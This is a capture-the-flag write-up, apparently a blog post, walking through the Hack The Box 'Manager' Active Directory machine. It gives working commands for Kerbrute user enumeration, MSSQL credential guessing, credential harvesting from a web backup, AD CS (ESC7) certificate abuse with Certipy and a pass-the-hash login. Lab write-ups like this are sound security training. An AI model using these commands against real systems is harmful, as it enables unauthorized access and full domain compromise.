Hack The Box Manager

Jp-Sec
5 min readMar 16, 2024

Initial Access

First of all, we start with an Nmap TCP scan to discover which ports are open

nmap -sC -sV -Pn <target ip>

The Nmap scan revealed numerous open ports. Initially, I attempted manual enumeration of the website (source code, Gobuster, etc.), but since it is a static website, I didn’t find anything interesting

We can see that this is an Active Directory machine, so I added manager.htb and dc01.manager.htb to my /etc/hosts file

Kerberos is open, let’s see if we can enumerate some users with the tool Kerbrute

kerbrute userenum -d manager.htb --dc <target ip> /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt

We discovered new usernames! Let’s put them in a file named user.txt

So now we have a list of usernames. I tried more Kerberos attacks, but nothing worked. From the Nmap scan, we can see MSSQL is open on port 1433. Let’s see if we can do something.

Doing some research, I discovered that Metasploit has a module to crack MSSQL passwords

I will use auxiliary/scanner/mssql/mssql_login

use auxiliary/scanner/mssql/mssql_login

set rhosts <target ip>

set user_file user.txt

set USER_AS_PASS true

set USE_WINDOWS_AUTHENT true

set verbose false

exploit

We see that the user operator is using operator as password

Let’s now connect to the MSSQL db, we can use the Impackets tool mssqlclient.py

impacket-mssqlclient -port 1433 manager/operator:operator@<target ip> -windows-auth

I found a useful command on StackOverflow related to xp_dirtree. This command will enable us to search within local directories

Let’s try out this command

EXEC MASTER.sys.xp_dirtree 'C:\', 1, 1

Indeed, it works! We can successfully see the contents of the C:\ directory. Now it’s time for enumeration

After enumeration, I found that the folder C:/inetpub/wwwroot contains a website backup zip file

EXEC MASTER.sys.xp_dirtree 'C:\inetpub\wwwroot\', 1, 1

Because it is in the web folder, we can download it with wget from our attacker machine

wget http://<target ip>/website-backup-27-07-23-old.zip

Let’s see if we can find juicy information. I’ll create a folder named website to unzip the content of the zip folder

mkdir website

unzip website-backup-27.07.23-old.zip

With ls -la, we can see that there’s a file named .old-conf.xml. This seems interesting

cat .old-conf.xml

We found the user raven and the password R4v3nBe5tD3veloP3r!123

We can connect with evil-winrm and get the user

evil-winrm -i <target ip> -u raven -p 'R4v3nBe5tD3veloP3r!123'

Privilege Escalation

I always start my post-exploitation with some manual enumerations

Let’s get started, first I will enumerate groups

whoami /groups

We can see that user Raven is in the Certificate Service DCOM Access group

A quick research certificate service dcom exploit lead me to this Hacktricks post

In the article, there are a couple of methods listed. We need to find the right one

To do so we can use the tools Certipy and BloodHound

First, we will use the Certipy command that you can find in the Hacktricks post. Do not forget to use old-bloodhound, otherwise, it will not be compatible with the current version of BloodHound

certipy find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip <target ip>

This will generate a JSON file that we can read. The file is very big, so we can use grep to filter out esc and have a better view

cat 20231024130019_Certipy.json | grep "ESC"

Great! Now we know which attack we need to do for privilege escalation

We will use attack 2 from the HacktTricks method. There’s a timer, so you need to execute all of these commands very quickly for it to work. I suggest typing all of these commands beforehand. If you don’t, the last command will fail

This will be all my commands

certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip <target ip> -ca 'manager-DC01-CA' -add-officer 'raven'

certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target dc01.manager.htb -template SubCA -upn administrator@manager.htb

certipy ca -ca 'manager-DC01-CA' -issue-request 13 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'

certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target dc01.manager.htb -retrieve 13

certipy auth -pfx "administrator.pfx" -dc-ip <target ip> -username 'administrator' -domain 'manager.htb'

In the screenshot you can see that I got an error KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type) if you get this error or you didn’t made the commands fast so you have a clock error, you need to do as following:

sudo ntpdate -s manager.htb

certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target dc01.manager.htb -retrieve 13

certipy auth -pfx "administrator.pfx" -dc-ip <target ip> -username 'administrator' -domain 'manager.htb'

Now that we have the administrator hashes, we can do the pass the hash attack with evil-winrm

evil-winrm -i <target ip> -u administrator -H <administrator hash>

--

--